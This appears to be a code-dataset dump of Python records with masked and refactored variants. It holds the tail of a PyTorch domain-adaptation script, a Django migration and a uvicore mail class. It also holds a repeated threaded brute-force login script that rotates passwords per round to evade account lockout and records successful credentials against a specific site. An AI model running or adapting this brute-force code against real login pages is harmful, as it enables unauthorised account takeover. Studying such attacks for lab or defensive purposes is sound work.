torch.from_numpy(label_t_train)\r\n label_t_test = torch.from_numpy(label_t_test)\r\n\r\n # seal to data-set\r\n train_dataset_s = Data.TensorDataset(data_s_train, label_s_train)\r\n train_dataset_t = Data.TensorDataset(data_t_train)\r\n val_dataset_s = Data.TensorDataset(data_s_val, label_s_val)\r\n val_dataset_t = Data.TensorDataset(data_t_val, label_t_val) #加的验证\r\n test_dataset_s = Data.TensorDataset(data_s_test, label_s_test.squeeze())\r\n test_dataset_t = Data.TensorDataset(data_t_test, label_t_test.squeeze())\r\n\r\n # print(train_dataset_s, val_dataset_s)\r\n criterion = nn.NLLLoss()\r\n\r\n train(train_dataset_s, val_dataset_s, val_dataset_t,train_dataset_t)\r\n s_test_acc = test(test_dataset_s)\r\n t_test_acc = test(test_dataset_t)\r\n print('\\n source_acc: {:.2f}% target_acc: {:.2f}%'.format(s_test_acc, t_test_acc))\r\n\r\n wandb.finish()\r\n\r\n\r\n",
"step-ids": [
3,
5,
7,
9,
10
]
}
|
[
3,
5,
7,
9,
10
] |
import argparse
import requests
from ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username
from random import choice
from time import sleep
MAX_ROUND = 3 # 爆破的轮数
curr_round = 0 # 当前的轮数
sleep_time = 2 # 每一轮休眠的秒数
def login_limit_user():
"""
登录函数
"""
try:
login_info = dict_queue.get(block=False)
except Exception as e:
print("[Error] {0}".format(repr(e)))
return
username = login_info[0]
# 如果这个用户名已经被爆破出来密码,那么跳过这个用户名
if username in success_username:
return
password = login_info[1]
# 登录
payload = {
"username": username,
"password": password,
}
print('开始尝试用户名:{},密码:{}'.format(username,password))
# url = "http://127.0.0.1:8000/user/login-block-account/?referer=/"
url = "http://ss.gentlecp.com:40000/user/login-block-account/?referer=/"
r = requests.post(url, data=payload)
# 判断是否登录成功
if r.status_code == 200:
msg = login_info
success_str = "欢迎访问GentleCP的网站"
if success_str in r.text:
# 登录成功则把登录信息保存到success_queue
success_queue.put(msg)
# 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破
success_username.append(username)
print("[INFO] success: ", msg)
# 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处
# stop_brute()
def get_dict(dict_user, dict_pass):
"""
生成字典队列
:return:
"""
with open("dict/{}".format(dict_user)) as f:
username = [line.strip() for line in f.readlines()]
with open('dict/{}'.format(dict_pass)) as f:
passwords = [line.strip() for line in f.readlines()]
count = 0
for u in username:
# 每一轮都换下一个密码
p = passwords[curr_round % len(passwords)]
count += 1
pair = (u, p)
dict_queue.put(pair)
print("字典生成完成,长度 {}".format(count))
def get_parse() -> dict:
parser = argparse.ArgumentParser()
parser.add_argument("--username", "-u", help="用户名字典")
parser.add_argument("--password", "-p", help="密码字典")
dic = vars(parser.parse_args())
return dic
def print_result():
"""
打印爆破的结果
"""
success = []
while not success_queue.empty():
success.append(success_queue.get())
print("\n[INFO] 爆破结果: ", success)
if __name__ == "__main__":
args = get_parse()
dict_username = args.get('dict_username', "username.txt")
dict_password = args.get('dict_password', "password.txt")
for curr_round in range(0, MAX_ROUND):
print("[INFO] 开始第{0}轮爆破".format(curr_round))
get_dict(dict_username, dict_password)
bruteforce(login_limit_user, thread_num=5)
print("[INFO] Sleep.")
sleep(2)
print_result()
|
normal
|
{
"blob_id": "94286fc36e06598b9faa65d9e5759f9518e436c6",
"index": 7979,
"step-1": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-3": "<mask token>\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-4": "import argparse\nimport requests\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\nfrom random import choice\nfrom time import sleep\nMAX_ROUND = 3\ncurr_round = 0\nsleep_time = 2\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print('[Error] {0}'.format(repr(e)))\n return\n username = login_info[0]\n if username in success_username:\n return\n password = login_info[1]\n payload = {'username': username, 'password': password}\n print('开始尝试用户名:{},密码:{}'.format(username, password))\n url = 'http://ss.gentlecp.com:40000/user/login-block-account/?referer=/'\n r = requests.post(url, data=payload)\n if r.status_code == 200:\n msg = login_info\n success_str = '欢迎访问GentleCP的网站'\n if success_str in r.text:\n success_queue.put(msg)\n success_username.append(username)\n print('[INFO] success: ', msg)\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open('dict/{}'.format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n count = 0\n for u in username:\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = u, p\n dict_queue.put(pair)\n print('字典生成完成,长度 {}'.format(count))\n\n\ndef get_parse() ->dict:\n parser = argparse.ArgumentParser()\n parser.add_argument('--username', '-u', help='用户名字典')\n parser.add_argument('--password', '-p', help='密码字典')\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print('\\n[INFO] 爆破结果: ', success)\n\n\nif __name__ == '__main__':\n args = get_parse()\n dict_username = args.get('dict_username', 'username.txt')\n dict_password = args.get('dict_password', 'password.txt')\n for curr_round in range(0, MAX_ROUND):\n print('[INFO] 开始第{0}轮爆破'.format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print('[INFO] Sleep.')\n sleep(2)\n print_result()\n",
"step-5": "import argparse\nimport requests\n\nfrom ba_bypass_bruteforce import bruteforce, stop_brute, success_queue, dict_queue, success_username\n\nfrom random import choice\nfrom time import sleep\n\n\nMAX_ROUND = 3 # 爆破的轮数\ncurr_round = 0 # 当前的轮数\nsleep_time = 2 # 每一轮休眠的秒数\n\n\ndef login_limit_user():\n \"\"\"\n 登录函数\n \"\"\"\n try:\n login_info = dict_queue.get(block=False)\n except Exception as e:\n print(\"[Error] {0}\".format(repr(e)))\n return\n\n username = login_info[0]\n # 如果这个用户名已经被爆破出来密码,那么跳过这个用户名\n if username in success_username:\n return\n\n password = login_info[1]\n # 登录\n payload = {\n \"username\": username,\n \"password\": password,\n }\n print('开始尝试用户名:{},密码:{}'.format(username,password))\n\n # url = \"http://127.0.0.1:8000/user/login-block-account/?referer=/\"\n url = \"http://ss.gentlecp.com:40000/user/login-block-account/?referer=/\"\n r = requests.post(url, data=payload)\n\n # 判断是否登录成功\n if r.status_code == 200:\n msg = login_info\n\n success_str = \"欢迎访问GentleCP的网站\"\n if success_str in r.text:\n # 登录成功则把登录信息保存到success_queue\n success_queue.put(msg)\n # 把登录成功的用户名添加到 success_username中,之后可以跳过这个用户名的密码的爆破\n success_username.append(username)\n print(\"[INFO] success: \", msg)\n\n # 如果想要爆破出来一个密码就立刻停止爆破,那么此处调用函数stop_brute,反之则注释此处\n # stop_brute()\n\n\ndef get_dict(dict_user, dict_pass):\n \"\"\"\n 生成字典队列\n :return:\n \"\"\"\n with open(\"dict/{}\".format(dict_user)) as f:\n username = [line.strip() for line in f.readlines()]\n\n with open('dict/{}'.format(dict_pass)) as f:\n passwords = [line.strip() for line in f.readlines()]\n\n count = 0\n for u in username:\n # 每一轮都换下一个密码\n p = passwords[curr_round % len(passwords)]\n count += 1\n pair = (u, p)\n dict_queue.put(pair)\n print(\"字典生成完成,长度 {}\".format(count))\n\n\ndef get_parse() -> dict:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--username\", \"-u\", help=\"用户名字典\")\n parser.add_argument(\"--password\", \"-p\", help=\"密码字典\")\n dic = vars(parser.parse_args())\n return dic\n\n\ndef print_result():\n \"\"\"\n 打印爆破的结果\n \"\"\"\n success = []\n while not success_queue.empty():\n success.append(success_queue.get())\n print(\"\\n[INFO] 爆破结果: \", success)\n\n\nif __name__ == \"__main__\":\n args = get_parse()\n dict_username = args.get('dict_username', \"username.txt\")\n dict_password = args.get('dict_password', \"password.txt\")\n\n for curr_round in range(0, MAX_ROUND):\n print(\"[INFO] 开始第{0}轮爆破\".format(curr_round))\n get_dict(dict_username, dict_password)\n bruteforce(login_limit_user, thread_num=5)\n print(\"[INFO] Sleep.\")\n sleep(2)\n\n print_result()\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('devices_collect', '0004_auto_20200209_1304')]
operations = [migrations.AlterField(model_name='collectdevices', name=
'generated_time', field=models.DateTimeField(default=datetime.
datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)))]
<|reserved_special_token_1|>
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [('devices_collect', '0004_auto_20200209_1304')]
operations = [migrations.AlterField(model_name='collectdevices', name=
'generated_time', field=models.DateTimeField(default=datetime.
datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)))]
<|reserved_special_token_1|>
# Generated by Django 3.0.3 on 2020-02-09 06:29
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('devices_collect', '0004_auto_20200209_1304'),
]
operations = [
migrations.AlterField(
model_name='collectdevices',
name='generated_time',
field=models.DateTimeField(default=datetime.datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)),
),
]
|
flexible
|
{
"blob_id": "b07d042c61e9e6647822989444e72db2e01c64d0",
"index": 5751,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('devices_collect', '0004_auto_20200209_1304')]\n operations = [migrations.AlterField(model_name='collectdevices', name=\n 'generated_time', field=models.DateTimeField(default=datetime.\n datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)))]\n",
"step-4": "import datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n dependencies = [('devices_collect', '0004_auto_20200209_1304')]\n operations = [migrations.AlterField(model_name='collectdevices', name=\n 'generated_time', field=models.DateTimeField(default=datetime.\n datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)))]\n",
"step-5": "# Generated by Django 3.0.3 on 2020-02-09 06:29\n\nimport datetime\nfrom django.db import migrations, models\nfrom django.utils.timezone import utc\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('devices_collect', '0004_auto_20200209_1304'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='collectdevices',\n name='generated_time',\n field=models.DateTimeField(default=datetime.datetime(2020, 2, 9, 6, 28, 34, 547300, tzinfo=utc)),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
@uvicore.service()
class Mail:
def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:
List=[], cc: List=[], bcc: List=[], from_name: str=None,
from_address: str=None, subject: str=None, html: str=None, text:
str=None, attachments: List=[]) ->None:
self._config = uvicore.config.app.mail.clone()
self._mailer = mailer or self._config.default
self._mailer_options = self._config.mailers[self._mailer].clone(
).merge(mailer_options)
self._message: Email = Email()
self._message.to = to
self._message.cc = cc
self._message.bcc = bcc
self._message.from_name = from_name or self._config.from_name
self._message.from_address = from_address or self._config.from_address
self._message.subject = subject
self._message.html = html
self._message.text = text
self._message.attachments = attachments
def mailer(self, mailer: str):
self._mailer = mailer
self._mailer_options = self._config.mailers[self._mailer].clone()
return self
<|reserved_special_token_0|>
def to(self, to: List):
self._message.to = to
return self
def cc(self, cc: List):
self._message.cc = cc
return self
<|reserved_special_token_0|>
def from_name(self, from_name: str):
self._message.from_name = from_name
return self
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
async def send(self):
driver = module.load(self._mailer_options.driver).object
await driver.send(self._message, self._mailer_options)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@uvicore.service()
class Mail:
def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:
List=[], cc: List=[], bcc: List=[], from_name: str=None,
from_address: str=None, subject: str=None, html: str=None, text:
str=None, attachments: List=[]) ->None:
self._config = uvicore.config.app.mail.clone()
self._mailer = mailer or self._config.default
self._mailer_options = self._config.mailers[self._mailer].clone(
).merge(mailer_options)
self._message: Email = Email()
self._message.to = to
self._message.cc = cc
self._message.bcc = bcc
self._message.from_name = from_name or self._config.from_name
self._message.from_address = from_address or self._config.from_address
self._message.subject = subject
self._message.html = html
self._message.text = text
self._message.attachments = attachments
def mailer(self, mailer: str):
self._mailer = mailer
self._mailer_options = self._config.mailers[self._mailer].clone()
return self
<|reserved_special_token_0|>
def to(self, to: List):
self._message.to = to
return self
def cc(self, cc: List):
self._message.cc = cc
return self
<|reserved_special_token_0|>
def from_name(self, from_name: str):
self._message.from_name = from_name
return self
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def html(self, html: str):
self._message.html = html
return self
<|reserved_special_token_0|>
def attachments(self, attachments: List):
self._message.attachments = attachments
return self
async def send(self):
driver = module.load(self._mailer_options.driver).object
await driver.send(self._message, self._mailer_options)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@uvicore.service()
class Mail:
def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:
List=[], cc: List=[], bcc: List=[], from_name: str=None,
from_address: str=None, subject: str=None, html: str=None, text:
str=None, attachments: List=[]) ->None:
self._config = uvicore.config.app.mail.clone()
self._mailer = mailer or self._config.default
self._mailer_options = self._config.mailers[self._mailer].clone(
).merge(mailer_options)
self._message: Email = Email()
self._message.to = to
self._message.cc = cc
self._message.bcc = bcc
self._message.from_name = from_name or self._config.from_name
self._message.from_address = from_address or self._config.from_address
self._message.subject = subject
self._message.html = html
self._message.text = text
self._message.attachments = attachments
def mailer(self, mailer: str):
self._mailer = mailer
self._mailer_options = self._config.mailers[self._mailer].clone()
return self
<|reserved_special_token_0|>
def to(self, to: List):
self._message.to = to
return self
def cc(self, cc: List):
self._message.cc = cc
return self
def bcc(self, bcc: List):
self._message.bcc = bcc
return self
def from_name(self, from_name: str):
self._message.from_name = from_name
return self
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def html(self, html: str):
self._message.html = html
return self
<|reserved_special_token_0|>
def attachments(self, attachments: List):
self._message.attachments = attachments
return self
async def send(self):
driver = module.load(self._mailer_options.driver).object
await driver.send(self._message, self._mailer_options)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@uvicore.service()
class Mail:
def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:
List=[], cc: List=[], bcc: List=[], from_name: str=None,
from_address: str=None, subject: str=None, html: str=None, text:
str=None, attachments: List=[]) ->None:
self._config = uvicore.config.app.mail.clone()
self._mailer = mailer or self._config.default
self._mailer_options = self._config.mailers[self._mailer].clone(
).merge(mailer_options)
self._message: Email = Email()
self._message.to = to
self._message.cc = cc
self._message.bcc = bcc
self._message.from_name = from_name or self._config.from_name
self._message.from_address = from_address or self._config.from_address
self._message.subject = subject
self._message.html = html
self._message.text = text
self._message.attachments = attachments
def mailer(self, mailer: str):
self._mailer = mailer
self._mailer_options = self._config.mailers[self._mailer].clone()
return self
def mailer_options(self, options: Dict):
self._mailer_options.merge(Dict(options))
return self
def to(self, to: List):
self._message.to = to
return self
def cc(self, cc: List):
self._message.cc = cc
return self
def bcc(self, bcc: List):
self._message.bcc = bcc
return self
def from_name(self, from_name: str):
self._message.from_name = from_name
return self
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def html(self, html: str):
self._message.html = html
return self
<|reserved_special_token_0|>
def attachments(self, attachments: List):
self._message.attachments = attachments
return self
async def send(self):
driver = module.load(self._mailer_options.driver).object
await driver.send(self._message, self._mailer_options)
<|reserved_special_token_1|>
import uvicore
from uvicore.support import module
from uvicore.typing import Dict, List
from uvicore.support.dumper import dump, dd
from uvicore.contracts import Email
@uvicore.service()
class Mail:
def __init__(self, *,
mailer: str = None,
mailer_options: Dict = None,
to: List = [],
cc: List = [],
bcc: List = [],
from_name: str = None,
from_address: str = None,
subject: str = None,
html: str = None,
text: str = None,
attachments: List = [],
) -> None:
# Get mailer and options from config
self._config = uvicore.config.app.mail.clone()
self._mailer = mailer or self._config.default
self._mailer_options = self._config.mailers[self._mailer].clone().merge(mailer_options)
# New message superdict
self._message: Email = Email()
self._message.to = to
self._message.cc = cc
self._message.bcc = bcc
self._message.from_name = from_name or self._config.from_name
self._message.from_address = from_address or self._config.from_address
self._message.subject = subject
self._message.html = html
self._message.text = text
self._message.attachments = attachments
def mailer(self, mailer: str):
self._mailer = mailer
self._mailer_options = self._config.mailers[self._mailer].clone()
return self
def mailer_options(self, options: Dict):
self._mailer_options.merge(Dict(options))
return self
def to(self, to: List):
self._message.to = to
return self
def cc(self, cc: List):
self._message.cc = cc
return self
def bcc(self, bcc: List):
self._message.bcc = bcc
return self
def from_name(self, from_name: str):
self._message.from_name = from_name
return self
def from_address(self, from_address: str):
self._message.from_address = from_address
return self
def subject(self, subject: str):
self._message.subject = subject
return self
def html(self, html: str):
self._message.html = html
return self
def text(self, text: str):
self._message.text = text
return self
def attachments(self, attachments: List):
self._message.attachments = attachments
return self
async def send(self):
# Use dynamic module based on mailer driver
driver = module.load(self._mailer_options.driver).object
await driver.send(self._message, self._mailer_options)
|
flexible
|
{
"blob_id": "c87ede0e3c6d4cc305450f68b4cf61fb63986760",
"index": 8676,
"step-1": "<mask token>\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:\n List=[], cc: List=[], bcc: List=[], from_name: str=None,\n from_address: str=None, subject: str=None, html: str=None, text:\n str=None, attachments: List=[]) ->None:\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone(\n ).merge(mailer_options)\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n <mask token>\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n <mask token>\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n async def send(self):\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-2": "<mask token>\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:\n List=[], cc: List=[], bcc: List=[], from_name: str=None,\n from_address: str=None, subject: str=None, html: str=None, text:\n str=None, attachments: List=[]) ->None:\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone(\n ).merge(mailer_options)\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n <mask token>\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n <mask token>\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n <mask token>\n <mask token>\n\n def html(self, html: str):\n self._message.html = html\n return self\n <mask token>\n\n def attachments(self, attachments: List):\n self._message.attachments = attachments\n return self\n\n async def send(self):\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-3": "<mask token>\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:\n List=[], cc: List=[], bcc: List=[], from_name: str=None,\n from_address: str=None, subject: str=None, html: str=None, text:\n str=None, attachments: List=[]) ->None:\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone(\n ).merge(mailer_options)\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n <mask token>\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n\n def bcc(self, bcc: List):\n self._message.bcc = bcc\n return self\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n <mask token>\n <mask token>\n\n def html(self, html: str):\n self._message.html = html\n return self\n <mask token>\n\n def attachments(self, attachments: List):\n self._message.attachments = attachments\n return self\n\n async def send(self):\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-4": "<mask token>\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *, mailer: str=None, mailer_options: Dict=None, to:\n List=[], cc: List=[], bcc: List=[], from_name: str=None,\n from_address: str=None, subject: str=None, html: str=None, text:\n str=None, attachments: List=[]) ->None:\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone(\n ).merge(mailer_options)\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n\n def mailer_options(self, options: Dict):\n self._mailer_options.merge(Dict(options))\n return self\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n\n def bcc(self, bcc: List):\n self._message.bcc = bcc\n return self\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n <mask token>\n <mask token>\n\n def html(self, html: str):\n self._message.html = html\n return self\n <mask token>\n\n def attachments(self, attachments: List):\n self._message.attachments = attachments\n return self\n\n async def send(self):\n driver = module.load(self._mailer_options.driver).object\n await driver.send(self._message, self._mailer_options)\n",
"step-5": "import uvicore\nfrom uvicore.support import module\nfrom uvicore.typing import Dict, List\nfrom uvicore.support.dumper import dump, dd\nfrom uvicore.contracts import Email\n\n\[email protected]()\nclass Mail:\n\n def __init__(self, *,\n mailer: str = None,\n mailer_options: Dict = None,\n to: List = [],\n cc: List = [],\n bcc: List = [],\n from_name: str = None,\n from_address: str = None,\n subject: str = None,\n html: str = None,\n text: str = None,\n attachments: List = [],\n ) -> None:\n # Get mailer and options from config\n self._config = uvicore.config.app.mail.clone()\n self._mailer = mailer or self._config.default\n self._mailer_options = self._config.mailers[self._mailer].clone().merge(mailer_options)\n\n # New message superdict\n self._message: Email = Email()\n self._message.to = to\n self._message.cc = cc\n self._message.bcc = bcc\n self._message.from_name = from_name or self._config.from_name\n self._message.from_address = from_address or self._config.from_address\n self._message.subject = subject\n self._message.html = html\n self._message.text = text\n self._message.attachments = attachments\n\n def mailer(self, mailer: str):\n self._mailer = mailer\n self._mailer_options = self._config.mailers[self._mailer].clone()\n return self\n\n def mailer_options(self, options: Dict):\n self._mailer_options.merge(Dict(options))\n return self\n\n def to(self, to: List):\n self._message.to = to\n return self\n\n def cc(self, cc: List):\n self._message.cc = cc\n return self\n\n def bcc(self, bcc: List):\n self._message.bcc = bcc\n return self\n\n def from_name(self, from_name: str):\n self._message.from_name = from_name\n return self\n\n def from_address(self, from_address: str):\n self._message.from_address = from_address\n return self\n\n def subject(self, subject: str):\n self._message.subject = subject\n return self\n\n def html(self, html: str):\n self._message.html = html\n return self\n\n def text(self, 